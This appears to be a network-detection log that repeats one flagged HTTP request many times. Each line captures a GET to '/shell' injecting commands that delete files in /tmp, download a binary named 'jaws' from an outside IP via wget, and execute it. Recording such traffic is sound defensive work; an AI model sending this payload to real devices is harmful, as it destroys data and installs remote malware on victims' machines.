      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
